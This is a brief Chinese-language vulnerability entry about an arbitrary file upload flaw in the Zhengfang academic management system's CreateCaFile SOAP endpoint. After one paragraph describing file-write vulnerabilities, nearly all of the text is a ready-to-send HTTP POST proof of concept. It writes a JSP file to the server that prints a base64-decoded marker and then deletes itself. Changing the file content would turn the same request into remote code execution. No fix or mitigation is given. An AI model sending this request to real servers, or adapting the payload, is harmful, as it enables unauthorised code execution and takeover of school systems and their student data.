漏洞描述
文件写入漏洞是指攻击者通过某种方式向服务器写入恶意文件,从而可能导致服务器被控制、数据被篡改或删除、服务被中断等严重后果。这种漏洞通常是由于应用程序对用户输入的文件名、路径或内容没有进行严格的验证和过滤,或者对文件上传功能的权限控制不够严格,使得攻击者能够上传恶意脚本或修改服务器上的文件。
正方教务管理系统 CreateCaFile 任意文件上传漏洞
PoC代码
POST /zfca/axis/CreateCaFile HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 885
Content-Type: text/xml;charset=UTF-8
Soapaction: ""
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.732.74 Safari/537.36
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:pub="http://pubService.webServices.zfca.zfsoft.com">
<soapenv:Header/>
<soapenv:Body>
<pub:createFile soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<filepath xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">159357777.jsp</filepath>
<content xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<![CDATA[
<%
out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));
new java.io.File(application.getRealPath(request.getServletPath())).delete();
%>
]]>
</content>
</pub:createFile>
</soapenv:Body>
</soapenv:Envelope>